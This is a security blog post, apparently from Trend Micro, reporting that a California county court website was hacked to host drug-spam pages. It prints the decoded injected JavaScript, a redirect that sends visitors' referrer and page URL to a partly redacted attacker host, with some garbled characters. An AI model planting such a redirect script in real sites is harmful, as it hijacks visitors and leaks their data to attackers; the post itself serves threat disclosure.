Something’s hot in California and it’s not Angelina. Barely two days since a CA .gov site has been confirmed to be hacked, Trend Micro received reports that another CA county .gov Web site is deep in porn trouble. The jury section of the Tulare superior court Web site http://www. tularesuperiorcourt.ca.gov/jury/ has been compromised, spouting such pages as:

* http://www. tularesuperiorcourt.ca.gov/jury/propecia.html
* http://www. tularesuperiorcourt.ca.gov/jury/meridia.html
* http://www. tularesuperiorcourt.ca.gov/jury/valium.html
* http://www. tularesuperiorcourt.ca.gov/jury/xanax.html
* http://www. tularesuperiorcourt.ca.gov/jury/adipex.html
* http://www. tularesuperiorcourt.ca.gov/jury/levitra.html
* http://www. tularesuperiorcourt.ca.gov/jury/cialis.html

Below is a screenshot of one of the said compromised pages:



The encrypted tag inserted into the hacked page decodes to:

window.location=(”http://{BLOCKED}yurls.com/in.cgi?2&seoref=”+encodeURIComponent(document.referrer)+�Ã�¶meter=&se=&ur=1&HTTP_REFERER=�+enc odeURIComponent(document.URL)+”&default_keyword={CBOSKEYWORD}”);

…ultimately, leading to the site http://{BLOCKED}yurls.com/in.cgi?. As of this writing, the said page redirects to another side and displays the following:



Trend Micro has duly notified the proper authorities and is working with US-CERT to mitigate this attack.

Further analysis provided by Trend Engineer Benson Sy.

If you're new here, you may want to subscribe to our RSS feed. Thanks for visiting!